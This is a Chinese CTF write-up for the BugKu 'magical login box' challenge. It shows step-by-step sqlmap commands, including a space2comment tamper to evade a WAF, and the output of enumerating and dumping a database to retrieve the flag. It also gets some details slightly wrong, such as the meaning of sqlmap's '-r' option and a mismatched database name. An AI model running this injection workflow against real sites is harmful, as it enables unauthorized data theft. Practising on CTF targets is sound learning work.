这是一个神奇的登陆框-BugKu

题目地址:http://123.206.87.240:9001/sql/
注意一下这个 URL 地址,有 sql,那么这道题八成是需要 SQL 注入,接下来看一下源码,使用的是 post 提交,那么我们就想到了 burp 抓包 + sqlMap 注入
这是一个神奇的登陆框-BugKu

1、使用 burp 抓包,然后将截获的数据保存下来,我这里保存为 sql.txt
这是一个神奇的登陆框-BugKu
2、打开 sqlmap,输入命令:sqlmap -r sql.txt -p admin_name --dbs --tamper=space2comment

解释一下:
-r 以只读方式打开 sql.txt 文件
-p 选择注入点
--dbs 获取数据库名字
---tamper=space2comment 过安全狗

3、爆出来的数据库有两个,那么肯定是 bugkuflag1 藏有 flag

available databases [2]:                                                       
[*] bugkusql1
[*] information_schema

4、爆数据库的数据表
执行命令:sqlmap -r sql.txt -p admin_name -D bugkusql1 --tables --tamper=space2comment
将会得出两个数据表

Database: bugkusql1                                                            
[2 tables]
+--------+
| flag1  |
| whoami |
+--------+

5、爆 flag1 数据表的字段
执行命令:sqlmap -r sql.txt -p admin_name -D bugkusql1 -T flag1 --columns --tamper=space2comment
得到的字段依然为 flag1

Database: bugkusql1                                                            
Table: flag1
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag1  | varchar(50) |
+--------+-------------+

6、爆字段内容
执行命令:sqlmap -r sql.txt -p admin_name -D bugkusql1 -T flag1 -C flag1 --dump --tamper=space2comment
这里可能需要输入 Y 或者 N,默认直接全部回车就行,然后就得到了flag,但是提交的时候记得格式是:flag格式flag{}

  1. upup说道:
    Google Chrome Windows 10

    网站自己搭的吗,界面很舒服

    1. 凤凰 凤凰说道:
      Google Chrome Windows 10

      谢谢,网站是自己搭的,主题用的别的大佬的

发表评论

电子邮件地址不会被公开。必填项已用 * 标注